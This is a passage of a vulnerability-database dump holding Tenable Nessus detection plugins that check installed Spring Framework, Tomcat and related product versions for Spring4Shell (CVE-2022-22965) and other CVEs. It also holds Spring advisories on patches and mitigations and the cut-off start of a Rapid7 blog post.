5.3.18 Remote Code Execution (CVE-2022-22965)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application framework library that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is,\ntherefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via\n data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application\n is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the\n nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their\nscan policy in order to enable this plugin in a scan. In addition, the 'Perform thorough tests' setting must be enabled\nas well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/cve-2022-22965\");\n # https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?718f9ac3\");\n # https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2401ae46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Framework version 5.2.20 or 5.3.18 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/31\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"requires_paranoid_scanning\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:spring_framework\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:spring_framework\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"spring_jar_detection.nbin\", \"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\", \"java_jre_installed_unix.nbin\", \"java_jre_installed_win.nbin\");\n script_require_keys(\"installed_sw/Spring Framework\", \"installed_sw/Apache Tomcat\", \"installed_sw/Java\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('tomcat_version.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Spring Framework');\n\n# A vuln version of Java must be installed for the exploit to work\nvar java_exit_message = 'A vulnerable version of Java is not installed. Spring Framework is, therefore, not vulnerable.';\nvar java_install_count = get_install_count(app_name:'Java', exit_if_zero:FALSE);\nif (java_install_count < 1)\n exit(0, java_exit_message);\nvar java_installs = get_combined_installs(app_name:'Java');\nif (java_installs[0] != IF_OK)\n exit(0, java_exit_message);\n\n# JDK 9+ is vulnerable\n# Exit if all detected Java installs are < 9\nvar vuln_java = FALSE;\nforeach var java_install (java_installs[1])\n{\n var java_version = str_replace(string:java_install.version, find:'_', replace:'.');\n if ( ver_compare(ver:java_version, fix:'1.9.0', strict:FALSE) >= 0 )\n {\n vuln_java = TRUE;\n break;\n }\n}\n\nif (!vuln_java)\n exit(0, java_exit_message);\n\n# A \"vulnerable\" version of Tomcat must be installed for the exploit to work\nvar tomcat_exit_message = 'A vulnerable version of Apache Tomcat is not installed. Spring Framework is, therefore, not vulnerable.';\nvar tomcat_install_count = get_install_count(app_name:'Apache Tomcat', exit_if_zero:FALSE);\nif (tomcat_install_count < 1)\n exit(0, tomcat_exit_message);\nvar tomcat_installs = get_combined_installs(app_name:'Apache Tomcat');\nif (tomcat_installs[0] != IF_OK)\n exit(0, tomcat_exit_message);\n\n# Tomcat 10.0.20, 9.0.62, and 8.5.78 are patched\n# Exit if all detected Tomcat installs are patched\nvar vuln_tomcat = FALSE;\nforeach var install (tomcat_installs[1])\n{\n if (\n tomcat_ver_cmp(ver:install.version, fix:'10.0.20', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'9.0.62', same_branch:TRUE) < 0 ||\n tomcat_ver_cmp(ver:install.version, fix:'8.5.78', same_branch:TRUE) < 0\n )\n {\n vuln_tomcat = TRUE;\n break;\n }\n}\n\nif (!vuln_tomcat)\n exit(0, tomcat_exit_message);\n\n# Non-default configuration\nif (report_paranoia < 2) \n audit(AUDIT_PARANOID);\n\nvar constraints = [\n { 'fixed_version':'5.2.20' },\n { 'min_version':'5.3', 'fixed_version':'5.3.18' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:48:32", "description": "The version of Dell Wyse Management Suite installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the DSA-2022-098 advisory.\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self- signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-08T00:00:00", "type": "nessus", "title": "Dell Wyse Management Suite < 3.6.1 Multiple Vulnerabilities (DSA-2022-098)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-0778", "CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:dell:wyse_management_suite"], "id": "DELL_WYSE_MANAGEMENT_SUITE_DSA-2022-098.NASL", "href": "https://www.tenable.com/plugins/nessus/161952", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161952);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2022-0778\", \"CVE-2022-22965\");\n script_xref(name:\"IAVA\", value:\"2022-A-0121-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Dell Wyse Management Suite < 3.6.1 Multiple Vulnerabilities (DSA-2022-098)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Dell Wyse Management Suite installed on the local host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Dell Wyse Management Suite installed on the remote host is prior to tested version. It is, therefore,\naffected by multiple vulnerabilities as referenced in the DSA-2022-098 advisory.\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop\n forever for non-prime moduli. Internally this function is used when parsing certificates that contain\n elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point\n encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has\n invalid explicit curve parameters. Since certificate parsing happens prior to verification of the\n certificate signature, any process that parses an externally supplied certificate may thus be subject to a\n denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they\n can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients\n consuming server certificates - TLS servers consuming client certificates - Hosting providers taking\n certificates or private keys from customers - Certificate authorities parsing certification requests from\n subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that\n use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS\n issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate\n which makes it slightly harder to trigger the infinite loop. However any operation which requires the\n public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-\n signed certificate to trigger the loop during verification of the certificate signature. This issue\n affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the\n 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected\n 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution\n (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR\n deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not\n vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be\n other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.dell.com/support/kbdoc/en-us/000198486/dsa-2022-098-dell-wyse-management-suite-security-update-for-multiple-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?beac8880\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell Wyse Management Suite 3.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dell:wyse_management_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"dell_wyse_management_suite_win_installed.nbin\");\n script_require_keys(\"installed_sw/Dell Wyse Management Suite\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar app_info = vcf::get_app_info(app:'Dell Wyse Management Suite', win_local:TRUE);\n\nvar constraints = [\n { 'fixed_version' : '3.6.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-03T17:27:27", "description": "The 5.9.0.0.0 and All Supported Versions versions of Oracle Business Intelligence Enterprise Edition (OAS) installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2022 CPU advisory.\n\n - Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Service Administration UI (JQuery)). The supported version that is affected is 5.9.0.0.0.\n Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. (CVE-2020-11023)\n\n - Security-in-Depth issue in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Service API (Spring Framework)). This vulnerability cannot be exploited in the context of this product.\n (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-17T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Publisher (OAS) (Jul 2022 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11023", "CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:business_intelligence_publisher"], "id": "ORACLE_BI_PUBLISHER_OAS_CPU_JUL_2022.NASL", "href": "https://www.tenable.com/plugins/nessus/164159", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164159);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2020-11023\", \"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Business Intelligence Publisher (OAS) (Jul 2022 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The 5.9.0.0.0 and All Supported Versions versions of Oracle Business Intelligence Enterprise Edition (OAS) installed\non the remote host are affected by multiple vulnerabilities as referenced in the July 2022 CPU advisory.\n\n - Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware\n (component: Service Administration UI (JQuery)). The supported version that is affected is 5.9.0.0.0.\n Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to\n compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction\n from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence\n Enterprise Edition, attacks may significantly impact additional products (scope change). Successful\n attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle\n Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset\n of Oracle Business Intelligence Enterprise Edition accessible data. (CVE-2020-11023)\n\n - Security-in-Depth issue in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Service\n API (Spring Framework)). This vulnerability cannot be exploited in the context of this product.\n (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpujul2022cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2022.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2022 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence_publisher\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_bi_publisher_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Publisher\");\n\n exit(0);\n}\n\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::get_app_info(app:'Oracle Business Intelligence Publisher');\n\nvar constraints = [\n # Oracle Analytics Server 5.9\n {'min_version': '12.2.5.9', 'fixed_version': '12.2.5.9.220714', 'patch': '34385848', 'bundle': '34385848'}\n];\n\nvcf::oracle_bi_publisher::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T15:39:10", "description": "The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. (CVE-2021-43980)", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-43980", "CVE-2022-22965"], "modified": "2023-03-21T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_78.NASL", "href": "https://www.tenable.com/plugins/nessus/159462", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159462);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/21\");\n\n script_cve_id(\"CVE-2021-43980\");\n\n script_name(english:\"Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to\n Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache\n Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause\n client connections to share an Http11Processor instance resulting in responses, or part responses, to be\n received by the wrong client. (CVE-2021-43980)\");\n # https://github.com/apache/tomcat/commit/4a00b0c0890538b9d3107eef8f2e0afadd119beb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c41b6749\");\n # https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72f4365d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.5.78 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43980\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'8.5.78', min:'8.0.0', severity:SECURITY_NOTE, granularity_regex: \"^8(\\.[012345])?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "spring": [{"lastseen": "2022-04-27T14:58:04", "description": "We have released [Spring Framework 5.3.17](<https://spring.io/blog/2022/03/17/spring-framework-6-0-0-m3-and-5-3-17-available-now>) and [Spring Framework 5.2.20](<https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE>) to address the following CVE report.\n\n * [CVE-2022-22950: Spring Expression DoS Vulnerability](<https://tanzu.vmware.com/security/cve-2022-22950>)\n\nPlease review the information in the CVE report and upgrade immediately.\n\nSpring Boot users should upgrade to [2.5.11](<https://spring.io/blog/2022/03/24/spring-boot-2-5-11-available-now>) or [2.6.5](<https://spring.io/blog/2022/03/24/spring-boot-2-6-5-available-now>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-28T08:00:00", "type": "spring", "title": "CVE report published for Spring Framework", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-03-28T08:00:00", "id": "SPRING:DE384E814B204ABC68C9A98C00ACA572", "href": "https://spring.io/blog/2022/03/28/cve-report-published-for-spring-framework", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-04-27T14:58:04", "description": "Yesterday we [announced](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) a Spring Framework RCE vulnerability [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>), listing Apache Tomcat as one of several preconditions. The Apache Tomcat team has since released versions **10.0.20**, **9.0.62**, and **8.5.78** all of which close the attack vector on Tomcat&#x27;s side. While the vulnerability is not in Tomcat itself, in real world situations, it is important to be able to choose among multiple upgrade paths that in turn provides flexibility and layered protection. \n\nUpgrading to Spring Framework **5.3.18+** or **5.2.20+** continues to be our main recommendation not only because it addresses the root cause and prevents other possible attack vectors, but also because it adds protection for other CVEs addressed since the current version in use. \n\nFor older, unsupported versions of the Spring Framework, the Tomcat releases provide an adequate solution for the reported attack vector. Nevertheless, we must stress that this should only be seen as a tactical solution, while the main goal should still be to upgrade to a currently [supported Spring Framework version](<https://github.com/spring-projects/spring-framework/wiki/Spring-Framework-Versions>) as soon as possible.\n\nLast but not least, it&#x27;s worth mentioning that downgrading to Java 8 provides another viable workaround, which may be another tactical solution option.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T11:49:00", "type": "spring", "title": "Spring Framework RCE, Mitigation Alternative", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T11:49:00", "id": "SPRING:EA9C08B2E57AC70E90A896D25F4A8BEE", "href": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 